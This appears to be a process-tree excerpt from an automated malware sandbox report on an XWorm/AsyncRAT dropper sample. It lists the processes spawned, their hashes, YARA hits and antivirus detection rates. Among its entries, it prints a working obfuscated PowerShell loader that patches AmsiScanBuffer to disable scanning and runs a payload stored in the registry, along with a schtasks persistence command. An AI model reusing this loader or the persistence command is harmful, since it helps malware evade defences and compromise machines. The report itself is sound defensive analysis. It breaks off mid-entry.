                                                                                                                                                                                Start time:13:37:04
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:4
                                                                                                                                                                                Start time:13:37:04
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1.exe"
                                                                                                                                                                                Imagebase:0xc90000
                                                                                                                                                                                File size:512'512 bytes
                                                                                                                                                                                MD5 hash:E1C82191B678CEA8F3C996887DDC1232
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.2208653873.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.2208653873.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                • Detection: 74%, ReversingLabs
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:5
                                                                                                                                                                                Start time:13:37:05
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe"
                                                                                                                                                                                Imagebase:0x7ff6fabe0000
                                                                                                                                                                                File size:9'629'457 bytes
                                                                                                                                                                                MD5 hash:CC32561980C2400C490A4849C78E38ED
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:6
                                                                                                                                                                                Start time:13:37:09
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Users\Public\DeadXClient.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Users\Public\DeadXClient.exe"
                                                                                                                                                                                Imagebase:0xc60000
                                                                                                                                                                                File size:35'840 bytes
                                                                                                                                                                                MD5 hash:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000000.2202434236.0000000000C62000.00000002.00000001.01000000.0000001A.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000000.2202434236.0000000000C62000.00000002.00000001.01000000.0000001A.sdmp, Author: ditekSHen
                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\DeadXClient.exe, Author: Joe Security
                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\DeadXClient.exe, Author: ditekSHen
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                • Detection: 87%, ReversingLabs
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:7
                                                                                                                                                                                Start time:13:37:09
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Users\Public\DeadROOTkit.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Users\Public\DeadROOTkit.exe"
                                                                                                                                                                                Imagebase:0xdd0000
                                                                                                                                                                                File size:43'520 bytes
                                                                                                                                                                                MD5 hash:7DD98FC2976EE270A278E1A9A28EEFAE
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp, Author: ditekSHen
                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.2316235027.000000000303C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\DeadROOTkit.exe, Author: ditekSHen
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                • Detection: 81%, ReversingLabs
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:8
                                                                                                                                                                                Start time:13:37:09
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Users\Public\DeadCodeRootKit.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\Public\DeadCodeRootKit.exe"
                                                                                                                                                                                Imagebase:0x150000
                                                                                                                                                                                File size:155'136 bytes
                                                                                                                                                                                MD5 hash:B8479A23C22CF6FC456E197939284069
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:9
                                                                                                                                                                                Start time:13:37:09
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PwejfaSCJJDP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vayDTkuWaaLxUU,[Parameter(Position=1)][Type]$fbfUvfPkbf)$SKuzEDmHWUw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+'ed'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+'o'+''+'r'+''+[Char](121)+''+'M'+''+'o'+'d'+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+'at'+'e'+'Ty'+[Char](112)+'e',''+[Char](67)+''+'l'+'a'+[Char](115)+'s,P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$SKuzEDmHWUw.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');$SKuzEDmHWUw.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$fbfUvfPkbf,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'im'+'e'+','+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $SKuzEDmHWUw.CreateType();}$mHgtxYLbOzoJe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.'+'d'+''+'l'+''+'l'+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'fe'+[Char](78)+''+'a'+''+'t'+'ive'+'M'+''+'e'+''+'t'+''+[Char](104)+''+'o'+'d'+'s'+'');$mfOCIRUxBUWIVl=$mHgtxYLbOzoJe.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+'c'+[Char](65)+'d'+[Char](100)+''+[Char](114)+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BQVbDmmpYciFvEPZCVf=PwejfaSCJJDP @([String])([IntPtr]);$EAvMyVuYpliIybTRzMjsOI=PwejfaSCJJDP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JZLeUIgnxFO=$mHgtxYLbOzoJe.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](77)+''+'o'+'d'+[Char](117)+''+'l'+''+[Char](101)+'H'+[Char](97)+''+'n'+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+'e'+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$yudsyoexNPPoGc=$mfOCIRUxBUWIVl.Invoke($Null,@([Object]$JZLeUIgnxFO,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'dL'+'i'+''+[Char](98)+''+'r'+''+'a'+'r'+'y'+''+[Char](65)+'')));$WIJhlFbJQceUyrYdX=$mfOCIRUxBUWIVl.Invoke($Null,@([Object]$JZLeUIgnxFO,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+''+'P'+'r'+'o'+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));$SWLVYEp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yudsyoexNPPoGc,$BQVbDmmpYciFvEPZCVf).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+'l'+'');$xjZyvNWKEgRcmEMjl=$mfOCIRUxBUWIVl.Invoke($Null,@([Object]$SWLVYEp,[Object]('Am'+[Char](115)+''+'i'+''+'S'+''+'c'+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+'r')));$gRxCzystuh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WIJhlFbJQceUyrYdX,$EAvMyVuYpliIybTRzMjsOI).Invoke($xjZyvNWKEgRcmEMjl,[uint32]8,4,[ref]$gRxCzystuh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$xjZyvNWKEgRcmEMjl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WIJhlFbJQceUyrYdX,$EAvMyVuYpliIybTRzMjsOI).Invoke($xjZyvNWKEgRcmEMjl,[uint32]8,0x20,[ref]$gRxCzystuh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue('Dead'+'s'+''+[Char](116)+''+[Char](97)+'ger')).EntryPoint.Invoke($Null,$Null)"
                                                                                                                                                                                Imagebase:0x7ff6e3d50000
                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:10
                                                                                                                                                                                Start time:13:37:09
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:11
                                                                                                                                                                                Start time:13:37:13
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"
                                                                                                                                                                                Imagebase:0x7ff76ae30000
                                                                                                                                                                                File size:235'008 bytes
                                                                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:12
                                                                                                                                                                                Start time:13:37:14
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:13
                                                                                                                                                                                Start time:13:37:14
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:14
                                                                                                                                                                                Start time:13:37:14
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\WerFault.exe -pss -s 492 -p 4188 -ip 4188
                                                                                                                                                                                Imagebase:0x7ff784be0000
                                                                                                                                                                                File size:570'736 bytes
                                                                                                                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:15
                                                                                                                                                                                Start time:13:37:15
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 4188 -s 1660
                                                                                                                                                                                Imagebase:0x7ff784be0000
                                                                                                                                                                                File size:570'736 bytes
                                                                                                                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:16
                                                                                                                                                                                Start time:13:37:15
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Users\Public\Deadsvchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Users\Public\Deadsvchost.exe
                                                                                                                                                                                Imagebase:0x360000
                                                                                                                                                                                File size:35'840 bytes
                                                                                                                                                                                MD5 hash:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\Deadsvchost.exe, Author: Joe Security
                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\Deadsvchost.exe, Author: ditekSHen
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                • Detection: 87%, ReversingLabs
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:18
                                                                                                                                                                                Start time:13:37:20
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\dllhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\dllhost.exe /Processid:{ac6bab9f-cf5e-448a-be82-36c64370aff3}
                                                                                                                                                                                Imagebase:0x7ff642ec0000
                                                                                                                                                                                File size:21'312 bytes
                                                                                                                                                                                MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:19
                                                                                                                                                                                Start time:13:37:20
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\winlogon.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:winlogon.exe
                                                                                                                                                                                Imagebase:0x7ff70f350000
                                                                                                                                                                                File size:906'240 bytes
                                                                                                                                                                                MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:20
                                                                                                                                                                                Start time:13:37:21
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\lsass.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\lsass.exe
                                                                                                                                                                                Imagebase:0x7ff7ac940000
                                                                                                                                                                                File size:59'456 bytes
                                                                                                                                                                                MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:21
                                                                                                                                                                                Start time:13:37:22
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:22
                                                                                                                                                                                Start time:13:37:23
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Users\Public\Deadsvchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Users\Public\Deadsvchost.exe"
                                                                                                                                                                                Imagebase:0xc50000
                                                                                                                                                                                File size:35'840 bytes
                                                                                                                                                                                MD5 hash:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:23
                                                                                                                                                                                Start time:13:37:23
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\dwm.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"dwm.exe"
                                                                                                                                                                                Imagebase:0x7ff68eb30000
                                                                                                                                                                                File size:94'720 bytes
                                                                                                                                                                                MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:24
                                                                                                                                                                                Start time:13:37:25
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:25
                                                                                                                                                                                Start time:13:37:26
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:26
                                                                                                                                                                                Start time:13:37:26
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:27
                                                                                                                                                                                Start time:13:37:26
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:28
                                                                                                                                                                                Start time:13:37:26
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:29
